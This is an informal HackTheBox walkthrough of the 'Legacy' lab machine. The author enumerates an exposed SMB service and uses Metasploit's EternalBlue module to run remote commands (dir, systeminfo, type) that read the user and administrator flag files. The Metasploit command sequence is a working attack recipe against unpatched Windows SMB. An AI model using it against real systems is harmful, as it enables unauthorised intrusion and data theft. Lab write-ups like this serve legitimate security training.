This is going to be a fast walkthrough. Nothing fancy here, I’m just going to switch over from vulnhub boxes to hackthebox boxes and I wanted to start with an easy one.

Many of these machines I have already rooted, like this one here.

Legacy’s only real challenge is if you want to run non-Metasploit exploits against it. For some reason I was having a super difficult time getting the Exploit-DB Python exploits to run on my Parrot-OS instance.

The exploits weren’t built for python3 and I didn’t want to waste time trying to convert them. So naturally I tried using python2, which is also installed, but when I went to pip install the missing modules, pip2 wasn’t installed and apt-cache didn’t have any available for download! lol

So I decided to just MSF this box and move on.

Exploiting Legacy

Well before we can exploit it, we need to see what services it has running.

Looks like just an SMB server is running.

Next I run enum4linux against the target to see what info we can rip out of it.

Not a ton of super useful info other than there’s no null sessions available so I guess we can rule that one out.

This leads me to believe that since this is supposed to be an easy box they’re probably looking for something simple like the Eternal Blue exploit.

Now I tried using the Exploit-DB exploits. Maybe it’s too late or I’m too lazy, but I didn’t feel like upgrading exploits to work with python3 lmao

So I took the easy route and went with Metasploit for this box.

HackTheBox – Legacy – Walkthrough

search eternal

use 3

set RHOSTS 10.10.10.4

set command dir

run

Looks like it’s vulnerable and that we got command execution. We’re sitting in the System32 directory.

set COMMAND systeminfo

Now it’s just a matter of finding our flags.

set COMMAND dir "c:\Documents and Settings\"

We’ll try and get john’s flag first. It’s usually on the desktop for Windows machines.

set COMMAND dir "c:\Documents and Settings\john\Desktop"

Yup, there it is. Now we can get it by just typing it out.

set COMMAND type "c:\Documents and Settings\john\Desktop\user.txt"

Next we’ll see if we can get our admin flag.

set COMMAND dir "c:\Documents and Settings\Administrator\Desktop"

That’s it!

Not a ton to say about this box. Not really that difficult to do with Metasploit. Maybe I’ll switch OSes and see if I can get the manual exploits to work on Kali.
